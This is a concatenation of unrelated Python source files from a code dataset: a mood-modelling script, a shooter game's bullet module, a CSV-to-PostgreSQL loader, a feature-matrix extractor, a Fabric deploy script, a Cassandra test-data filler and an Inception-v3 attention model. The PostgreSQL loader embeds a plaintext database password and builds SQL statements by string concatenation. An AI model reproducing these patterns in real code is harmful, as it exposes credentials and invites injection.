wfpt_nsamp=self.wfpt_nsamp,\n nsamp=self.gen_nsamp, \n trange=np.linspace(0, self.max_time-self.params['t0'], self.trange_nsamp))\n \n # calc prob of making the observed choice\n ind = choices==choice\n p_choice = ind.mean()\n \n # calc mean log rt\n choice_mean_log_rt = np.log(rts[ind]+self.params['t0']).mean()\n \n \n return log_like, p_choice, choice_mean_log_rt\n \n return log_like, mood_log_like \n \n def proc_trials(self, trials, save_posts=False, return_mood_like=False):\n # loop over trials\n #latents = {'CA_sum':0, 'EG_sum':0, 'RPE_sum':0}\n latents = {'LTA_sum':0, 'RPE_sum':0}\n reward_sum=0\n #avg_reward_trial=0\n for i in range(len(trials)):\n # calc_E and save it to the current trial\n EC,EG = self.calc_E(trials.iloc[i])\n trials.at[trials.index[i], 'EC'] = EC\n trials.at[trials.index[i], 'EG'] = EG\n trials.at[trials.index[i], 'Ediff'] = EC-EG\n \n # calc_R and save it to the current trial\n rwrd = self.calc_Reward(trials.iloc[i])\n \n ### Long Term subjective reward calculation (Correction March 12, 2020)\n if i==0:\n trials.at[trials.index[i], 'LTA']=0\n else:\n trials.at[trials.index[i], 'LTA']=reward_sum/trial_num \n reward_sum=reward_sum+rwrd\n trial_num=i+1\n \n\n # update_p (QUESTION: Does it matter whether update_p happens before or after calc likelihood)\n new_p, RPE, r = self.update_p(trials.iloc[i])\n trials.at[trials.index[i], 'new_p'] = new_p\n trials.at[trials.index[i], 'RPE'] = RPE\n trials.at[trials.index[i], 'r'] = r\n # update\n latents = self.calc_latents(trials.iloc[i], latents)\n #trials.at[trials.index[i], 'CA_sum'] = latents['CA_sum']\n trials.at[trials.index[i], 'LTA_sum'] = latents['LTA_sum']\n trials.at[trials.index[i], 'RPE_sum'] = latents['RPE_sum']\n\n \n # calc_trial_like\n if save_posts:\n log_like, p_choice, choice_mean_log_rt = self.calc_trial_like(trials.iloc[i], \n save_post=save_posts)\n trials.at[trials.index[i], 'log_like'] = log_like\n trials.at[trials.index[i], 'p_choice'] = p_choice\n trials.at[trials.index[i], 'choice_mean_log_rt'] = choice_mean_log_rt\n \n else:\n log_like, mood_log_like = self.calc_trial_like(trials.iloc[i])\n trials.at[trials.index[i], 'log_like'] = log_like\n ### Mood_log_like\n trials.at[trials.index[i], 'mood_log_like'] = mood_log_like\n \n \n \n# Reac_time=np.array([trials.at[trials.index[i], 'RT']])\n# v_mean=trials.at[trials.index[i], 'Ediff']\n# GAMMA=self.params['gamma']\n# BETA = self.params['beta']\n# A=self.params['a']\n# W=self.params['w']\n# T0=self.params['t0']\n# P0=self.params['p0']\n# Sv=self.params['s_v']\n# LAMBDA=self.params['lambda']\n# WLTA=self.params['w_LTA']\n# WRPE=self.params['w_RPE']\n# B=self.params['b']\n #import pdb; pdb.set_trace()\n if np.isnan(trials.at[trials.index[i], 'log_like']):\n #print((Reac_time,v_mean,GAMMA,BETA,P0,Sv,A,W,T0,LAMBDA,WLTA,WRPE,B), flush=True)\n raise ValueError(\"Log_Like NaN value\") \n if np.isnan(trials.at[trials.index[i], 'mood_log_like']):\n #print((Reac_time,v_mean,GAMMA,BETA,C,P0,Sv), flush=True)\n raise ValueError(\"Mood_Log_Like NaN value\")\n if trials.at[trials.index[i], 'mood_log_like']==None:\n print([trials.index[i], 'mood_log_like'])\n print(trials.at[trials.index[i], 'log_like'])\n raise ValueError(\"Zero value\")\n \n # return trials with useful columns added\n return trials\n\n \n# read in the data\ndef load_mmi_data(filename):\n \n dat = pd.read_csv(filename)\n # ignore rows with no trial info\n dat= dat.dropna(how ='any', subset = ['certainAmount'])\n #dat = dat.loc[~np.isnan(dat.winAmount)]\n dat=dat.reset_index(drop=True)\n # grab the columns of interest\n # CertainAmount, Outcome1Amount (one of the gambling outcomes), \n # Outcome2Amount (one of the gambling outcomes), \n # Outcome (which outcome occurred, certain or Outcome1 or Outcome2), \n # GetAnswer_RT\n# cols = ['CertainAmount', 'Outcome1Amount', 'Outcome2Amount', 'Outcome', 'GetAnswer__RT',\n# 'MoodTarget', 'TrialHappiness__SliderResp', 'DoRating', 'CurrentAmount'\n# ]\n cols=['certainAmount','happySlider.response','winAmount','loseAmount','choiceKey.rt','outcome','doRating']\n dat = dat[cols]\n\n # add useful columns\n # first rename some\n #dat['RT'] = dat['GetAnswer__RT']/1000.\n dat['RT'] = dat['choiceKey.rt'] # original RT data is in seconds\n dat['RT'] = dat['RT'].fillna(0.0) # removing NaN values with 0\n \n #dat.at[12, 'RT'] = 2\n #dat.loc[1,'RT']=2\n dat['Mood'] = dat['happySlider.response']*1000.0 # original Mood data range 0-1\n \n ### replacing Mood Rating 0-->1 and 1000-->999\n dat.Mood = dat.Mood.replace({0: 1.0, 1000: 999.0})\n \n # Certain amount\n dat['CertainAmount'] = dat['certainAmount']\n \n # add a choice\n dat['Choice'] = 'None'\n ind = (dat['RT']>0)\n dat.loc[ind&(dat['outcome']=='certain'), 'Choice'] = 'Certain'\n dat.loc[ind&(dat['outcome']=='win'), 'Choice'] = 'Gamble'\n dat.loc[ind&(dat['outcome']=='lose'), 'Choice'] = 'Gamble'\n\n # add outcome amount\n dat['OutcomeAmount'] = dat['certainAmount']\n ind = (dat['outcome']=='win')\n dat.loc[ind, 'OutcomeAmount'] = dat.loc[ind, 'winAmount']\n ind = (dat['outcome']=='lose')\n dat.loc[ind, 'OutcomeAmount'] = dat.loc[ind, 'loseAmount']\n\n # add greater and lesser amounts\n dat['GreaterAmount'] = dat['winAmount']\n dat['LesserAmount'] = dat['loseAmount']\n# ind = (dat.Outcome2Amount > dat.Outcome1Amount)\n# dat.loc[ind, 'GreaterAmount'] = dat.loc[ind, 'Outcome2Amount']\n# dat.loc[ind, 'LesserAmount'] = dat.loc[ind, 'Outcome1Amount']\n dat['Won'] = dat['OutcomeAmount'] == dat['GreaterAmount']\n \n dat['win'] = dat.Won.astype(int)\n Ntrial_idx = dat.index.values + 1\n dat['win_prob'] = np.cumsum(dat.win)/Ntrial_idx \n \n# dat['actual_p'] = 0.7\n# dat.loc[dat['MoodTarget']==70, 'actual_p'] = 0.3\n\n return dat\n","sub_path":"notebook/MMI_Open_Loop/mmi_mood_LTA_gamma_WO_beta_p0_OL.py","file_name":"mmi_mood_LTA_gamma_WO_beta_p0_OL.py","file_ext":"py","file_size_in_byte":13452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"378375067","text":"from bulletml import Bullet, BulletML, collision\n\nfrom shooter.texture import Texture\n\n\nclass MyBullet(Bullet):\n def __init__(self, radius=8, root=False, **kwargs):\n Bullet.__init__(self, radius=radius, **kwargs)\n for tag in self.tags:\n if tag.startswith(\"texture=\"):\n self.texture = Texture(tag[len(\"texture=\"):])\n break\n else:\n self.texture = None\n self.root = root\n self.z = 0\n\nclass BulletSet(set):\n def update_roots(self, x, y):\n for bullet in self:\n if bullet.root:\n bullet.x = x\n bullet.y = y\n\n def step(self, w,h,t):\n new_bullets = set()\n dead_bullets = set()\n\n for bullet in self:\n new_bullets.update(bullet.step())\n if bullet.finished:\n dead_bullets.add(bullet)\n\n if not (-t <= bullet.x <= w+t) or not (-t <= bullet.y <= h+t):\n dead_bullets.add(bullet)\n\n self |= new_bullets\n self -= dead_bullets\n\n def collides(self, other):\n return collision.collides_all(other, list(self))\n\n def load(self, filename, source, target, rank=0.5):\n bullet = MyBullet.FromDocument(BulletML.FromDocument(open(\"bml/\" + filename, \"rU\")), source.x, source.y, target=target, rank=rank)\n bullet.root = True\n self.add(bullet)\n","sub_path":"shooter/entities/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"150069066","text":"import psycopg2 as p\nfrom sqlalchemy import create_engine\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef FindAnimalID(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tAnimalID = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:9] == \"AnimalID\"):\n\t\t\tAnimalID = current[12:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn AnimalID\n\t\n\t\ndef FindTreatment(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tTreatment = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:10] == \"Treatment\"):\n\t\t\tTreatment = current[13:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn Treatment\n\t\ndef FindHeader(textfile):\n\tmouseText = open(textfile, \"r\")\n\theader = 0\n\tcount = 0\n\twhile(count < 100):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:11] == \"Trial time\"):\n\t\t\theader = count\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn header\n\t\ndef FindInvestigator(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tInvestigator = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:13] == \"Investigator\"):\n\t\t\tInvestigator = current[16:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn Investigator\t\n\n\t\ndef Prep(mouselocation):\t\n\tstart = time.time()\n\tHeaderValue = FindHeader(mouselocation)\n\tAnimalID = FindAnimalID(mouselocation, HeaderValue)\n\tTreatment = FindTreatment(mouselocation, HeaderValue)\n\tInvestigator = FindInvestigator(mouselocation, HeaderValue)\n\tmouse = pd.read_csv(mouselocation, sep=\";\", header=HeaderValue, na_values=[\"-\", \"s\", \"s?\", \"cm\", \"cm?\", \"cm/s\", \"cm/s?\"])\n\tmouse = mouse.drop(mouse.index[[0]])\n\tmouse = mouse.reset_index()\n\tdel mouse[\"index\"]\n\tmouse = mouse[[\"Recording time\", \"X center\", \"Y center\", \"Distance moved\", \"Velocity\", \"In zone(InShelter / center-point)\", \"Include: Left Entrance D1\", \"Include: Mid Entrance D1\", \"Include: Right Entrance D1\", \"Include: Left Entrance D2\", \"Include: Mid Entrance D2\", \"Include: Right Entrance D2\", \"Include: Left Entrance Rev D1\", \"Include: Mid Entrance Rev D1\", \"Include: Right Entrance Rev D1\", \"Include: Left Entrance Rev D2\", \"Include: Mid Entrance Rev D2\", \"Include: Right Entrance Rev D2\", \"Hardware command\", \"Hardware continuous\"]]\n\tmouse.columns = [\"Time\", \"X\", \"Y\", \"DistanceMoved\", \"Velocity\", \"InShelter\", \"LeftD1\", \"MiddleD1\", \"RightD1\", \"LeftD2\", \"MiddleD2\", \"RightD2\", \"LeftD3\", \"MiddleD3\", \"RightD3\", \"LeftD4\", \"MiddleD4\", \"RightD4\", \"Command\", \"Continuous\"]\n\tmouse[\"Investigator\"] = Investigator\n\tmouse[\"AnimalID\"] = AnimalID\n\tmouse[\"Treatment\"] = Treatment\n\tprint(AnimalID + \" loaded in \" + str(time.time()-start) + \" seconds\") \n\treturn mouse\n\t\n\ndef AddMouse(mouse):\n\tstart = time.time()\n\tAnimalID = mouse[\"AnimalID\"][0]\n\tfullpath = \"C:/Inputs/\" + AnimalID + \"raw.csv\"\n\tmouse.to_csv(fullpath, index=False)\n\tprint(\"mouse exported to csv in \" + str(time.time()-start) + \" seconds\")\n\tstart = time.time()\n\ttry:\n\t\tconnection = p.connect(user = \"postgres\", password=\"GHJ67car\", host = \"localhost\", port = \"5432\", database = \"mice\")\n\t\tcursor = connection.cursor()\n\t\tcolumns = mouse.columns\n\t\tlastthree = len(columns) - 3\n\t\tcreatequery = \"create table mouse\" + AnimalID + \"(\"\n\t\tfor i in range(0, lastthree):\n\t\t\tcreatequery = createquery + mouse.columns[i] + \" float, \"\n\t\tcreatequery = createquery + mouse.columns[lastthree] + \" varchar(255), \"\n\t\tcreatequery = createquery + mouse.columns[lastthree+1] + \" varchar(255), \"\n\t\tcreatequery = createquery + mouse.columns[lastthree+2] + \" varchar(255))\"\n\t\tcursor.execute(createquery)\n\t\tconnection.commit()\n\t\tcursor.execute(\"copy mouse\" + AnimalID + \" from '\" + fullpath + \"' DELIMITER ',' CSV HEADER;\")\n\t\tconnection.commit()\n\t\tprint(\"mouse copied to PostgreSQL in \" + str(time.time()-start) + \" seconds\")\n\t\t\t\t\n\texcept (Exception, p.Error) as error:\n\t\tprint(\"Error while connecting to PostgreSQL\", error)\n\tfinally:\n\t\tif(connection):\n\t\t\tcursor.close()\n\t\t\tconnection.close()\n\t\t\tprint(\"PostgreSQL connection is closed\")\n\t\t\t\nmouse1 = Prep(\"C:/Inputs/2.txt\")\t\t\t\nAddMouse(mouse1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pandastosql.py","file_name":"pandastosql.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558596419","text":"#Extract features from features.csv code (efcc1.0.0)\r\n#Extract all features and the summary collumn as well from featurs.csv files\r\n#Aggreagates all features into one big matrix in readiness for SVM input\r\n#Effectively creating the labeled data for SVM input\r\n#NB: If you edit this code, change the editor section\r\n#@Author: Karari\r\n#Address: ephantus.karari@ibearesearch.org\r\n#website: ibearesearch.org\r\n#Date Created: 9/7/2020\r\n#Last Edited: 9/7/2020\r\n#Editor: Karari\r\n#version: 1.0.0\r\n#Appreciation: All creators of packages used in this code\r\n\r\n#import predefined python packages\r\n\r\nimport os\r\nimport re, math\r\nimport pandas as pd\r\nimport sklearn as sk\r\nimport easygui\r\nfrom collections import Counter\r\n\r\n\r\n\r\n\r\n#define relevant variables\r\ncf_path = ''#csv files path\r\nuf_path=''#User summary file path\r\nsf_path='' #summary file path\r\nof_path='' #output file path\r\ninput_str='' #input string\r\noutput_str=''#output string\r\nif_file=''#holds name of original file for use in naming generated file\r\nin_folder=''#holds name of original folder for use in naming generated folder\r\nfpf_counter=''#counts the number of files per folder\r\nfpi_counter=''#counts the number of files per individual summarizer\r\nsent=''#count the number of sentences per file\r\nindv=''#name of bacth per currator\r\n\r\n#intialize variables and instantiate objects\r\n#ff_path=easygui.fileopenbox()#obtain the path to the features file\r\ncf_path=easygui.fileopenbox()#obtain the path to the csv file\r\n\r\n#Derive summary\r\nroot_path=cf_path\r\nrootdir = cf_path[0:22]\r\nk=0\r\nj=0\r\nprint('Root Folder: '+rootdir)#'C:\\pfiles\\features_csv'\r\nfor subdir, dirs, files in os.walk(rootdir):\r\n l=0\r\n for file in files:\r\n root_path=os.path.join(subdir, file)#\r\n in_folder=root_path[23:29]\r\n #print(root_path)\r\n #convert csv to dataframe and assign headers on the fly\r\n #access the collumn called ds for its values\r\n df = pd.read_csv(root_path,delimiter=',', header=None, names=['1','2','3','4','5','tf','ss','td','sp','ds'])\r\n features=''\r\n #convert the overall sumarry into dataframe\r\n #acess the last collumn now labelled dt(derived total) and write the figures to it.\r\n #df1= pd.read_csv('C:\\\\pfiles\\\\summary\\\\user\\\\summary.csv',delimiter=',', header=None, names=['A','B','C','D','T','DT'])\r\n for i in df.index:\r\n a=str(df['tf'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n b=str(df['ss'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n c=str(df['td'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n d=str(df['sp'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n s=str(df['ds'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n\r\n if(len(a)>4):\r\n a=a[0:4]\r\n #print(k[3:])\r\n if((a[3:])=='.'):\r\n a=a[0:2]\r\n \r\n\r\n if(len(b)>4):\r\n b=b[0:3]\r\n if((b[3:])=='.'):\r\n b=b[0:2]\r\n \r\n if(len(c)>4):\r\n c=c[0:4]\r\n #print(k[3:])\r\n if((c[3:])=='.'):\r\n c=c[0:2]\r\n\r\n if(len(d)>4):\r\n d=d[0:4]\r\n #print(k[3:])\r\n if((d[3:])=='.'):\r\n d=d[0:2]\r\n \r\n\r\n features=str(a)+\",\"+str(b)+\",\"+str(c)+\",\"+str(d)+\",\"+str(s)\r\n output_str+=features+'\\n'\r\n k+=1\r\n l+=1\r\n #print(features)\r\n #print(\"File \"+root_path+\" has \"+str(i+1)+\" lines\")\r\n \r\n #print(\"Folder \"+in_folder+\" has \"+str(l+1)+\" lines\")\r\n#print(\"Total Lines \"+str(k)+\" of 33525 written\")\r\n \r\nprint(\"Done-Check file in path:C:\\\\pfiles\\\\Matrix\\\\matrix.txt\")\r\n#write back the data frame df1 to the csv file\r\n#together with the new collumn 'DT' for derived total\r\n#store the resolved feature matrix in a file (matrix)in C:\\pfiles\\Matrix folder\r\n#of_path=easygui.fileopenbox()#obtain the path to the output file\r\nof_path='C:\\\\pfiles\\\\Matrix\\\\matrix.txt'\r\n#os.makedirs(os.path.dirname(of_path), exist_ok=True)#create folder that does not exist\r\nwith open(of_path, 'w',encoding='UTF8') as f_out:\r\n f_out.write(output_str)\r\n f_out.close()\r\n#pd.to_csv('C:\\\\pfiles\\\\summary\\\\user\\\\s.csv', index=False, header=None) \r\n #EOF\r\n","sub_path":"qodec1.0.0/efcc1_0_0.py","file_name":"efcc1_0_0.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"346910442","text":"# from __future__ import with_statement\nfrom fabric.api import local, abort, settings, run, env, cd, sudo\nfrom fabric.contrib.console import confirm\n\nenv.roledefs = {\n 'dev': ['localhost'],\n 'prod': ['root@737apps.com']\n}\n\nenv.roledefs['all'] = [h for r in env.roledefs.values() for h in r]\n\n\ndef commit(message='updating...'):\n \"\"\"\n commit changes to staging area\n :param message:\n :return:\n \"\"\"\n local(\"git add --all\")\n with settings(warn_only=True):\n result = local(\"git commit -m '%s'\" % message, capture=True)\n if result.failed and not confirm(\"Tests failed. Continue anyway?\"):\n abort(\"Aborting at your behest\")\n\n\ndef pull():\n \"\"\"\n update environment\n :return:\n \"\"\"\n local(\"git pull\")\n\n\ndef migrate(is_local=True):\n \"\"\"\n update environment\n :return:\n \"\"\"\n if is_local:\n local(\"php artisan migrate\")\n else:\n run(\"php artisan migrate\")\n\n\ndef update_environs(message='updating...'):\n \"\"\"\n update local working environment\n :return:\n \"\"\"\n commit(message)\n pull()\n migrate()\n\n\ndef push(message='updating...', should_commit=True):\n \"\"\"\n push changes\n :return:\n \"\"\"\n if should_commit is True:\n commit(message)\n local(\"git push\")\n\n\ndef start_services(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl start %s' % _service)\n\n\ndef stop_service(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl stop %s' % _service)\n\n\ndef restart_service(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl restart %s' % _service)\n\n\ndef clear(is_remote=False):\n \"\"\"\n clear configuration\n \"\"\"\n if is_remote:\n run('php artisan config:clear')\n run('php artisan config:cache')\n run('php artisan view:clear')\n return\n\n local('php artisan config:clear')\n local('php artisan config:cache')\n local('php artisan view:clear')\n return\n\n\ndef deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n clear(True)\n restart_service(['httpd'])\n\n\ndef migrate_deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n migrate(is_local=False)\n clear(True)\n restart_service(['httpd'])\n\n\ndef full_deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n sudo('composer install')\n migrate(is_local=False)\n clear(True)\n restart_service(['httpd'])","sub_path":"server/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511558043","text":"import faker\nimport random\nimport multiprocessing\nfrom cassandra.cluster import Cluster\n\nimport constants\n\n\nclass CassandraFillerFakes(faker.providers.BaseProvider):\n def __init__(self, *args, **kwargs):\n super(CassandraFillerFakes, self)\n self.fake = faker.Faker()\n\n def register(self):\n return {\n 'day': \"'{}'\".format(self.fake.date()),\n 'user_id': 'uuid()',\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"'{} {}.123'\".format(self.fake.date(), self.fake.time())\n }\n\n def user_activity(self):\n return {\n 'user_id': 'uuid()',\n 'event_type': \"'{}'\".format(random.choice(constants.EVENT_TYPES)),\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"dateOf(now())\"\n }\n\n def enter_attempts(self):\n return {\n 'day': \"toDate(now())\",\n 'user_id': 'uuid()',\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"dateOf(now())\"\n }\n\n\nclass CassandraFiller:\n def __init__(self):\n self.cluster = Cluster()\n self.session = self.cluster.connect(constants.KEYSPACE_NAME)\n self.faker = faker.Faker()\n self.faker.add_provider(CassandraFillerFakes)\n\n def _insert_record(self, database, record, ttl=''):\n query = \"INSERT INTO {}{} VALUES ({}) {};\" \\\n .format(database, constants.DATABASES_COLUMNS[database], record, ttl)\n self.session.execute(query)\n\n def insert_register_record(self, data=None):\n if not data:\n data = self.faker.register()\n\n values = ''\n\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_REGISTER, values[:-2])\n\n def insert_registers(self, records_number):\n for user_id in range(records_number):\n data = self.faker.register()\n self.insert_register_record(data)\n\n def insert_user_activity_record(self, data=None):\n if not data:\n data = self.faker.user_activity()\n\n ttl = ''\n values = ''\n\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_USER_ACTIVITY, values[:-2], ttl)\n\n def insert_user_activities(self, records_number):\n for _ in range(records_number):\n data = self.faker.user_activity()\n self.insert_user_activity_record(data)\n\n def insert_enter_attempts_record(self, data=None):\n if not data:\n data = self.faker.enter_attempts()\n\n values = ''\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_ENTER_ATTEMPTS, values[:-2])\n\n def insert_enter_attempts(self, records_number):\n for _ in range(records_number):\n data = self.faker.enter_attempts()\n self.insert_enter_attempts_record(data)\n\n\ndef fill():\n filler = CassandraFiller()\n # activity = filler.get_register()\n # filler.insert_registers(200000)\n # filler.insert_user_activities(200000)\n filler.insert_enter_attempts(200)\n\n\ndef multiprocessing_fill(processes_number):\n workers = []\n for i in range(processes_number):\n workers.append(multiprocessing.Process(target=fill))\n\n for worker in workers:\n worker.start()\n\n for worker in workers:\n worker.join()\n\n\nif __name__ == '__main__':\n filler = CassandraFiller()\n # activity = filler.get_register()\n # filler.insert_registers(20)\n # print(list(activity))\n # filler.insert_register({'day': \"'2018-01-03'\", #'toconstants.Date(now())',\n # 'user_id': i,\n # 'device_type': \"'mobile'\",\n # 'event_time': 'dateOf(now())'})\n # multiprocessing_fill()\n filler.insert_user_activities(20000)\n filler.insert_registers(20000)\n filler.insert_enter_attempts(20000)\n # filler.remove_registers_by_uuids('bb1ed1ec-28b6-4b93-9ffa-e0e0d40d73da')\n # filler.update_register_by_uuid(\"device_type = 'mobile'\", '834cd519-b58b-490d-bf3e-953da8cdc8de')\n","sub_path":"course_3/helper-concierge/api/cassandra_api/filler.py","file_name":"filler.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"294091230","text":"from .se_module import SELayer\nfrom torchsummary import summary\nfrom torchvision.models.inception import Inception3\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nfrom .da_att import PAM_Module,CAM_Module\n\n__all__ = ['Inception3','Inception_v3_PAM']\n\nmodel_urls = {\n 'inception_v3_google':'https://download.pytorch.org/models/inception_v3_google-1a9a5a14.pth'\n}\n\n\n'''\nThis model is inceptionV3+SENet+PAM_Module/CAM_Module\n'''\ndef Inception_v3_PAM(pretrained=False,**kwargs):\n if pretrained:\n if 'transform_input' not in kwargs:\n kwargs['transform_input'] = True\n model = Inception3(**kwargs)\n model.load_state_dict(model_zoo.load_url(model_urls['inception_v3_google']))\n return model\n return Inception3(**kwargs)\n\nclass Inception3(nn.Module):\n def __init__(self,num_classes=1000,aux_logits=True,transform_input=False):\n super(Inception3,self).__init__()\n self.aux_logits = aux_logits\n self.transform_input = transform_input\n self.Conv2d_1a_3x3 = BasicConv2d(3,32,kernel_size=3,stride=2)\n self.Conv2d_2a_3x3 = BasicConv2d(32,32,kernel_size=3)\n self.Conv2d_2b_3x3 = BasicConv2d(32, 64, kernel_size=3,padding=1)\n self.Conv2d_3b_1x1 = BasicConv2d(64, 80, kernel_size=1)\n self.Conv2d_4a_3x3 = BasicConv2d(80, 192, kernel_size=3)\n self.Conv2d_get_feature = nn.Conv2d(2048,3,kernel_size=1,bias=False)\n self.Mixed_5b = nn.Sequential(\n InceptionA(192,pool_features=32))\n self.PAM_1 = PAM_Module(256)\n self.CAM_1 = CAM_Module(256)\n\n self.Mixed_5c = nn.Sequential(\n InceptionA(256, pool_features=64))\n self.PAM_2 = PAM_Module(288)\n self.CAM_2 = CAM_Module(288)\n\n self.Mixed_5d = nn.Sequential(\n InceptionA(288, pool_features=64))\n self.PAM_3 = PAM_Module(288)\n self.CAM_3 = CAM_Module(288)\n # downsample\n self.Mixed_6a = nn.Sequential(\n InceptionB(288))\n self.PAM_4 = PAM_Module(768)\n self.CAM_4 = CAM_Module(768)\n\n self.Mixed_6b = nn.Sequential(\n InceptionC(768, channels_7x7=128))\n self.PAM_5 = PAM_Module(768)\n self.CAM_5 = CAM_Module(768)\n\n self.Mixed_6c = nn.Sequential(\n InceptionC(768, channels_7x7=160))\n self.PAM_6 = PAM_Module(768)\n self.CAM_6 = CAM_Module(768)\n\n self.Mixed_6d = nn.Sequential(\n InceptionC(768, channels_7x7=160))\n self.PAM_7 = PAM_Module(768)\n self.CAM_7 = CAM_Module(768)\n\n self.Mixed_6e = nn.Sequential(\n InceptionC(768, channels_7x7=192))\n self.PAM_8 = PAM_Module(768)\n self.CAM_8 = CAM_Module(768)\n\n if aux_logits:\n self.AuxLogits = InceptionAux(768,num_classes)\n # downsample\n self.Mixed_7a = nn.Sequential(\n InceptionD(768))\n self.PAM_9 = PAM_Module(1280)\n self.CAM_9 = CAM_Module(1280)\n\n self.Mixed_7b = nn.Sequential(\n InceptionE(1280))\n self.PAM_10 = PAM_Module(2048)\n self.CAM_10 = CAM_Module(2048)\n\n self.Mixed_7c = nn.Sequential(\n InceptionE(2048))\n self.PAM_11 = PAM_Module(2048)\n self.CAM_11 = CAM_Module(2048)\n\n self.fc = nn.Linear(2048,num_classes)\n\n for m in self.modules():\n if isinstance(m,nn.Conv2d) or isinstance(m,nn.Linear):\n import scipy.stats as stats\n stddev = m.stddev if hasattr(m,'stddev') else 0.1\n X = stats.truncnorm(-2,2,scale=stddev)\n values = torch.as_tensor(X.rvs(m.weight.data.numel()),dtype=m.weight.dtype)\n values = values.view(m.weight.size())\n with torch.no_grad():\n m.weight.data.copy_(values)\n elif isinstance(m,nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x):\n if self.transform_input:\n x = x.clone()\n x[:, 0] = x[:, 0] * (0.229 / 0.5) + (0.485 - 0.5) / 0.5\n x[:, 1] = x[:, 1] * (0.224 / 0.5) + (0.456 - 0.5) / 0.5\n x[:, 2] = x[:, 2] * (0.225 / 0.5) + (0.406 - 0.5) / 0.5\n\n x = self.Conv2d_1a_3x3(x)\n x = self.Conv2d_2a_3x3(x)\n x = self.Conv2d_2b_3x3(x)\n x = F.max_pool2d(x,kernel_size=3,stride=2)\n x = self.Conv2d_3b_1x1(x)\n x = self.Conv2d_4a_3x3(x)\n x = F.max_pool2d(x,kernel_size=3,stride=2)\n\n x = self.Mixed_5b(x)\n x1 = self.PAM_1(x)\n x2 = self.CAM_1(x)\n x = x1 + x2\n\n x = self.Mixed_5c(x)\n x1 = self.PAM_2(x)\n x2 = self.CAM_2(x)\n x = x1 + x2\n\n x = self.Mixed_5d(x)\n x1 = self.PAM_3(x)\n x2 = self.CAM_3(x)\n x = x1 + x2\n\n x = self.Mixed_6a(x)\n x1 = self.PAM_4(x)\n x2 = self.CAM_4(x)\n x = x1 + x2\n # \"\"\"In practice, we have found that employing this factorization does not\n # work well on early layers, but it gives very good results on medium\n # grid-sizes (On m × m feature maps, where m ranges between 12 and 20).\n # On that level, very good results can be achieved by using 1 × 7 convolutions\n # followed by 7 × 1 convolutions.\"\"\"\n x = self.Mixed_6b(x)\n x1 = self.PAM_5(x)\n x2 = self.CAM_5(x)\n x = x1 + x2\n\n x = self.Mixed_6c(x)\n x1 = self.PAM_6(x)\n x2 = self.CAM_6(x)\n x = x1 + x2\n\n x = self.Mixed_6d(x)\n x1 = self.PAM_7(x)\n x2 = self.CAM_7(x)\n x = x1 + x2\n\n x = self.Mixed_6e(x)\n x1 = self.PAM_8(x)\n x2 = self.CAM_8(x)\n x = x1 + x2\n\n # Efficient Grid Size Reduction\n x = self.Mixed_7a(x)\n x1 = self.PAM_9(x)\n x2 = self.CAM_9(x)\n x = x1 + x2\n\n # We are using this solution only on the coarsest grid,\n # since that is the place where producing high dimensional\n # sparse representation is the most critical as the 